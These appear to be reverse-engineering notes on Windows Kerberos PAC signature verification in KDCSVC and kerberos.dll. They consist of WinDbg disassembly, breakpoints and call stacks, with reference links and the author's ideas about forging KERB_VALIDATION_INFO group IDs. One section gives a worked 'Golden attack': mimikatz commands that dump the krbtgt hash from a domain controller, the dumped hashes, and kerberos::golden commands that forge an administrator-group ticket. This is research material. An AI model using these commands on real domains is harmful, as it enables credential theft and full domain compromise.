63a91d0d ffd1 call ecx
63a91d0f e97a74ffff jmp KDCSVC!KdcVerifyPacSignature+0x18f (63a8918e)
KDCSVC!KdcVerifyPacSignature+0x1f1:
63a91d14 f6401c40 test byte ptr [eax+1Ch],40h
63a91d18 0f85ca74ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x1fb:
63a91d1e 687bffffff push 0FFFFFF7Bh
63a91d23 ff7584 push dword ptr [ebp-7Ch]
63a91d26 e848fefeff call KDCSVC!KerbGetKeyFromList (63a81b73)
63a91d2b 8bf0 mov esi,eax
63a91d2d 85f6 test esi,esi
63a91d2f 0f84b374ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x212:
63a91d35 8d45b8 lea eax,[ebp-48h]
63a91d38 50 push eax
63a91d39 8b45a0 mov eax,dword ptr [ebp-60h]
63a91d3c ff30 push dword ptr [eax]
63a91d3e e86cfefeff call KDCSVC!CDLocateCheckSum (63a81baf)
63a91d43 85c0 test eax,eax
63a91d45 7d0c jge KDCSVC!KdcVerifyPacSignature+0x230 (63a91d53)
KDCSVC!KdcVerifyPacSignature+0x224:
63a91d47 c745bc0f000000 mov dword ptr [ebp-44h],0Fh
63a91d4e e99f74ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x230:
63a91d53 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d56 8b4820 mov ecx,dword ptr [eax+20h]
63a91d59 85c9 test ecx,ecx
63a91d5b 7414 je KDCSVC!KdcVerifyPacSignature+0x24e (63a91d71)
KDCSVC!KdcVerifyPacSignature+0x23a:
63a91d5d 8d45b4 lea eax,[ebp-4Ch]
63a91d60 50 push eax
63a91d61 6a11 push 11h
63a91d63 8d45c0 lea eax,[ebp-40h]
63a91d66 50 push eax
63a91d67 ff7604 push dword ptr [esi+4]
63a91d6a ff7608 push dword ptr [esi+8]
63a91d6d ffd1 call ecx
63a91d6f eb0f jmp KDCSVC!KdcVerifyPacSignature+0x25d (63a91d80)
KDCSVC!KdcVerifyPacSignature+0x24e:
63a91d71 8d4db4 lea ecx,[ebp-4Ch]
63a91d74 51 push ecx
63a91d75 6a11 push 11h
63a91d77 ff7604 push dword ptr [esi+4]
63a91d7a ff7608 push dword ptr [esi+8]
63a91d7d ff501c call dword ptr [eax+1Ch]
KDCSVC!KdcVerifyPacSignature+0x25d:
63a91d80 85c0 test eax,eax
63a91d82 7d0c jge KDCSVC!KdcVerifyPacSignature+0x26d (63a91d90)
KDCSVC!KdcVerifyPacSignature+0x261:
63a91d84 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91d8b e96274ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x26d:
63a91d90 8d45e8 lea eax,[ebp-18h]
63a91d93 50 push eax
63a91d94 8b45b8 mov eax,dword ptr [ebp-48h]
63a91d97 ff7004 push dword ptr [eax+4]
63a91d9a ff75b4 push dword ptr [ebp-4Ch]
63a91d9d ff5010 call dword ptr [eax+10h]
63a91da0 8d45d4 lea eax,[ebp-2Ch]
63a91da3 50 push eax
63a91da4 ff75b4 push dword ptr [ebp-4Ch]
63a91da7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91daa ff5014 call dword ptr [eax+14h]
63a91dad 8d45b4 lea eax,[ebp-4Ch]
63a91db0 50 push eax
63a91db1 8b45b8 mov eax,dword ptr [ebp-48h]
63a91db4 ff5018 call dword ptr [eax+18h]
63a91db7 8b45b8 mov eax,dword ptr [ebp-48h]
63a91dba 8b4804 mov ecx,dword ptr [eax+4]
63a91dbd 8b459c mov eax,dword ptr [ebp-64h]
63a91dc0 8b4004 mov eax,dword ptr [eax+4]
63a91dc3 83e804 sub eax,4
63a91dc6 3bc8 cmp ecx,eax
63a91dc8 7510 jne KDCSVC!KdcVerifyPacSignature+0x2b3 (63a91dda)
KDCSVC!KdcVerifyPacSignature+0x2a7:
63a91dca 8d7dc0 lea edi,[ebp-40h]
63a91dcd 8d75d4 lea esi,[ebp-2Ch]
63a91dd0 33c0 xor eax,eax
63a91dd2 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a91dd4 0f840e74ffff je KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2b3:
63a91dda 687c1ea963 push offset KDCSVC!`string' (63a91e7c)
KDCSVC!KdcVerifyPacSignature+0x2bf:
63a91ddf 6a01 push 1
63a91de1 e89d1effff call KDCSVC!KDCDebugPrint (63a83c83)
63a91de6 59 pop ecx
63a91de7 59 pop ecx
63a91de8 c745bc29000000 mov dword ptr [ebp-44h],29h
63a91def eb1f jmp KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x2d8:
63a91df1 ff7510 push dword ptr [ebp+10h]
63a91df4 ff75b0 push dword ptr [ebp-50h]
63a91df7 e85a58ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a91dfc 84c0 test al,al
63a91dfe 0f85e473ffff jne KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2e7:
63a91e04 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a91e0b e9d873ffff jmp KDCSVC!KdcVerifyPacSignature+0x2ee (63a891e8)
KDCSVC!KdcVerifyPacSignature+0x2f4:
63a91e10 8b75a8 mov esi,dword ptr [ebp-58h]
63a91e13 0fb706 movzx eax,word ptr [esi]
63a91e16 40 inc eax
63a91e17 40 inc eax
63a91e18 50 push eax
63a91e19 e84301ffff call KDCSVC!MIDL_user_allocate (63a81f61)
63a91e1e 8bd8 mov ebx,eax
63a91e20 85db test ebx,ebx
63a91e22 7416 je KDCSVC!KdcVerifyPacSignature+0x31e (63a91e3a)
KDCSVC!KdcVerifyPacSignature+0x308:
63a91e24 0fb70e movzx ecx,word ptr [esi]
63a91e27 8b7604 mov esi,dword ptr [esi+4]
63a91e2a 8bc1 mov eax,ecx
63a91e2c c1e902 shr ecx,2
63a91e2f 8bfb mov edi,ebx
63a91e31 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a91e33 8bc8 mov ecx,eax
63a91e35 83e103 and ecx,3
63a91e38 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
KDCSVC!KdcVerifyPacSignature+0x31e:
63a91e3a 53 push ebx
63a91e3b 6a01 push 1
63a91e3d 8d45bc lea eax,[ebp-44h]
63a91e40 50 push eax
63a91e41 6a04 push 4
63a91e43 68120000c0 push 0C0000012h
63a91e48 6a01 push 1
63a91e4a e8aa550000 call KDCSVC!ReportServiceEvent (63a973f9)
63a91e4f 83c418 add esp,18h
63a91e52 85db test ebx,ebx
63a91e54 0f849873ffff je KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x33a:
63a91e5a 53 push ebx
63a91e5b e84700ffff call KDCSVC!MIDL_user_free (63a81ea7)
63a91e60 e98d73ffff jmp KDCSVC!KdcVerifyPacSignature+0x340 (63a891f2)
KDCSVC!KdcVerifyPacSignature+0x349:
63a91e65 8b45b8 mov eax,dword ptr [ebp-48h]
63a91e68 85c0 test eax,eax
63a91e6a 0f848f73ffff je KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
KDCSVC!KdcVerifyPacSignature+0x350:
63a91e70 8d4db4 lea ecx,[ebp-4Ch]
63a91e73 51 push ecx
63a91e74 ff5018 call dword ptr [eax+18h]
63a91e77 e98373ffff jmp KDCSVC!KdcVerifyPacSignature+0x357 (63a891ff)
[*] Golden attack:
(1) From the AD:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : SMALLBUSINESS / S-1-5-21-1053798420-2132824579-2427655443
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 6375ac5dba2a03b83002ba6e6e96c547 <-- it is what we need!
* WDigest
01 bf816f365e0fac18a06269b62fdec3cd
02 60bcd5b31db779bee316ead3f9f2bdc5
03 052450bedad3c62b6c7ac2e0518cced6
04 bf816f365e0fac18a06269b62fdec3cd
05 60bcd5b31db779bee316ead3f9f2bdc5
06 6b46611bab1bfc37642831eb4c378a3c
07 bf816f365e0fac18a06269b62fdec3cd
08 36d36b240d95960b3280c17f3dbdd4ef
09 36d36b240d95960b3280c17f3dbdd4ef
10 7700dc3feea8de94dfe42fadd189b562
11 cf5dd5487a5bf52ddb92114e11b35258
12 36d36b240d95960b3280c17f3dbdd4ef
13 85c06a5e70ebb4ea9ea94ec741afc3f4
14 cf5dd5487a5bf52ddb92114e11b35258
15 9e215c82295f151f068a61dcfc25df79
16 9e215c82295f151f068a61dcfc25df79
17 2bbe05a083dd57a8db17231355da9ef5
18 d66e91d4fcd16a0e98c16bec14676e06
19 63381fd3a292e6d6c89ced1f6b14e580
20 111ef3e25e5237fea3190ae4924c981c
21 68c6af34d37db9eeed0e32540f60fe3a
22 68c6af34d37db9eeed0e32540f60fe3a
23 207d5247bd7dac0b5100035d0d6ffb6d
24 5db537f6bfc59059821180dc06e18696
25 5db537f6bfc59059821180dc06e18696
26 f8247c1ccff30ab886e699e401c98241
27 03ddbc3697b4eac454c5c8a5746c4165
28 98b8c45c30f3eb9727de422e2ff11429
29 72fed805b12f04991c8326e8664f909f
* Kerberos
Default Salt : SMALLBUSINESS.LOCALkrbtgt
Credentials
des_cbc_md5 : 497f68d05db65be0
des_cbc_crc : 497f68d05db65be0
6375ac5dba2a03b83002ba6e6e96c547
(2) From the machine we’re attacking (user juan):
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:6375ac5dba2a03b83002ba6e6e96c547
That’s all.
I think the idea is similar to the golden attac, but hopefully we don’t need the
krbtgt key anymore. Even when I can modify the SignatureType, and create RC4
encrypted tickets with different signautres. The key is needed still to encrypt
a ticket.
So, by modifying mimikatz I can easily create different “malformed tickets”. Even
when I can switch the signature mekanism I neeed the krbtgt hash to encrypt the
TGT ticket.
(Hash for DES)
kerberos::golden /domain:SMALLBUSINESS.local /sid:S-1-5-21-1053798420-2132824579-2427655443 /user:juan /id:1116 /groups:513,500 /krbtgt:497f68d05db65be0
To check the signature used by ValidationInfo I’m using the next breakoint:
bp 63a89167 “r edx; dd edx L1; kb 4; g”
gwillcox-r7 at November 22, 2020 3:35am UTC reported:
Troubleshooting kerberos on windows
<http://technet.microsoft.com/en-us/library/cc738673(WS.10).aspx>
<http://www.itninja.com/blog/view/taming-the-three-headed-beast-kerberos>
Golden and silver ticket
<https://www.youtube.com/watch?v=-IMrNGPZTl0> (blackhat)
<http://www.slideshare.net/gentilkiwi/bluehat-2014realitybites>
<http://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
<http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos> (ticket format)
<https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos>
MS-PAC: Privilege Attribute Certificate Data Structure
<http://msdn.microsoft.com/en-us/library/cc237917.aspx>
Microsoft Authorization Data Specification
<http://mirror.die.net/banned/microsoft-kerberos-extensions.html>
Authentication structures:
<http://msdn.microsoft.com/en-us/library/windows/desktop/aa378120(v=vs.85).aspx>
More Kerberos fun with PAC’s- decrypt the PAC
<http://i1.blogs.msdn.com/b/spatdsg/archive/2009/03/26/more-kerberos-fun-with-pac-s.aspx>
Kerberos PAC Validation… what is it?
<http://blogs.msdn.com/b/spatdsg/archive/2007/03/07/pac-validation.aspx>
Kerberos on windows
<https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
Windows 2003: Security Event ids related to kerberos 540 (logon) / 538 (logoff)
I’m pretty sure the information to forge exists inside service kerberos ticket
On my opinion the idea is to forge the KERB_VALIDATION_INFO. It contains:
ULONG GroupCount;
[size_is(GroupCount)] PGROUP_MEMBERSHIP GroupIds;
Where:
typedef struct _GROUP_MEMBERSHIP {
ULONG RelativeId;
ULONG Attributes;
} *PGROUP_MEMBERSHIP;
By modifying the RelativeId in the service ticket, I think is the way related
to the privilege escalation (See ticket_samples.txt for KERB_VALIDATION_INFO dump)
But… how to tamper that information? Since the kerberos communication (server
running on 88/udp) happens through lsass (running as system), tampering communications
doesn’t look a good idea. Even worse, the KERB_VALIDATION_INFO is located inside the
ticket, which travels encrypted. I NEED TO CHECK, CAREFULLY WHERE THE PAC IS ADDED,
HOPEFULLY, IT’S IN A BLOG CIPHERED WITH THE USER PRIVATE KEY. CANNOR REMIND JUST NOW, TODO!
Just remembering cached tickets maybe can be tampered TODO:review
bp kdcsvc!I_GetAsTicket ".echo I_GetAsTicket; g"
Reachecd through _KdcGetTicket (also an export)
bp kdcsvc!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; g"
This one is reached from when handling TGT Requests, aparently
HandleTGSRequest –> GetTGSTicket…
bp kdcsvc!KdcVerifyPac ".echo KdcVerifyPac; g"
It’s an export, also reached through “CredentialUpdateFree”
When I authenticate to a service, IIS, through Kerberos, it’s the call sequence:
I_GetAsTicket
KdcVerifyPacSignature
KdcVerifyPacSignature
I_GetAsTicket
KdcVerifyPacSignature
Okay, come on to check, what happens when I add the kerberos function:
kd> bp kerberos!KerbVerifyPacsignature ".echo kerberos!KerbVerifyPacsignature; g"
kd> g
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
Makes sense! Come on to check some call stacks to check where things come from:
kd> bl
0 e 63a8b814 0001 (0001) KDCSVC!I_GetASTicket ".echo I_GetAsTicket; kb 4; g"
1 e 63a89013 0001 (0001) KDCSVC!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; kb 4; g"
2 e 63a8d3ad 0001 (0001) KDCSVC!KdcVerifyPac ".echo KdcVerifyPac; kb 4; g"
3 e 71ca8587 0001 (0001) kerberos!KerbVerifyPacSignature ".echo kerberos!KerbVerifyPacsignature; kb 4; g"
_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050ae688 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050ae688 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015b9e0 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015b9e4 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145238 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145238 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00aef7b8 71cb1ef3 00aefa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00aef8fc 71cb1159 00000001 00aefab0 0017c1e8 kerberos!KerbCreateTokenFromTicket+0x1de
00aefaec 4ab860d2 0016cce0 00000000 3c9b6229 kerberos!SpAcceptLsaModeContext+0xb09
00aefb60 4abc94a8 00aefc18 00aefbf8 00aefbe0 LSASRV!WLsaAcceptContext+0x139
I_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050b73b8 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050b73b8 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015bc10 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015bc14 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145418 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145418 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00c6f7b8 71cb1ef3 00c6fa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00c6f8fc 71cb1159 00000001 00c6fab0 0017c190 kerberos!KerbCreateTokenFromTicket+0x1de
00c6faec 4ab860d2 0016cce0 00000000 3f4a60da kerberos!SpAcceptLsaModeContext+0xb09
00c6fb60 4abc94a8 00c6fc18 00c6fbf8 00c6fbe0 LSASRV!WLsaAcceptContext+0x139
So, obviously I_GetAsTicket is called through the first query (AS), KdcVerifyPacSignature and
kerberos!KerbVerifyPacsignature is called on the second request (TGT). Looks like the PAC is
parsed/verified in the second query (TGT, makes sense).
[*] Other backtraces for my review while logging in the domain from XP SP3 client
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf980 71d17acb 000b8780 00000290 009cfd84 kerberos!PAC_UnMarshal
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x2ec
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 5 hit
kerberos!PAC_ReMarshal:
001b:71d2d188 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15b25 000b8780 00000290 009cf9cc kerberos!PAC_ReMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x185
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15c04 000b8780 00000290 009cf9cc kerberos!PAC_UnMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x264
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 1 hit
kerberos!PAC_UnmarshallValidationInfo:
001b:71d2d466 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 3 hit
kerberos!PAC_DecodeValidationInformation:
001b:71d2cf2e 6a14 push 14h
kd> kb
ChildEBP RetAddr Args to Child
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 8 hit
kerberos!PPAC_IDL_VALIDATION_INFO_Decode:
001b:71d2d6f5 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf844 71d2cf7f 000936f0 009cf9f0 000b89c0 kerberos!PPAC_IDL_VALIDATION_INFO_Decode
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation+0x51
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
[*] More breakpoints when from XP SP3 client: Looks like there are two paths, to
get the TGT ticket, and to get the service ticket. The last one is the interesting
I think.
kd> kb
ChildEBP RetAddr Args to Child
0007f4c0 71cfbc26 00103828 000ed248 000c2f48 kerberos!KerbCacheTicket
0007f68c 71cf3611 00101ce0 000f6c30 00000000 kerberos!KerbGetAuthenticationTicket+0xa77
0007f760 71cf33c8 00101ce0 000f6c30 00000000 kerberos!KerbGetTicketGrantingTicket+0x2f4
0007f794 71cf1db1 00000000 000f6c30 00000000 kerberos!KerbGetTicketForCredential+0x5d
0007f7f4 71cf2d85 000f6c30 80000002 00000000 kerberos!KerbReferenceCredential+0x12a
0007f9a8 7573c293 000f6c30 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xae3
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 13 hit
kerberos!KerbCacheTicket:
001b:71cf9a79 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
0007f6ec 71cf9a6f 00103818 000d5240 000c2f48 kerberos!KerbCacheTicket
0007f7cc 71cf722e 00101ce0 000f6c30 00000000 kerberos!KerbGetServiceTicket+0x893
0007f9a8 7573c293 00000002 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xd60
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Reaching the important point on my case:
kd> uf KDCSVC!KdcVerifyPacSignature
KDCSVC!KdcVerifyPacSignature:
63a89013 8bff mov edi,edi
63a89015 55 push ebp
63a89016 8bec mov ebp,esp
63a89018 81eca8000000 sub esp,0A8h
63a8901e a10010ab63 mov eax,dword ptr [KDCSVC!__security_cookie (63ab1000)]
63a89023 53 push ebx
63a89024 56 push esi
63a89025 8b7514 mov esi,dword ptr [ebp+14h]
63a89028 8945fc mov dword ptr [ebp-4],eax
63a8902b 8b4508 mov eax,dword ptr [ebp+8]
63a8902e 57 push edi
63a8902f 8945ac mov dword ptr [ebp-54h],eax
63a89032 8b450c mov eax,dword ptr [ebp+0Ch]
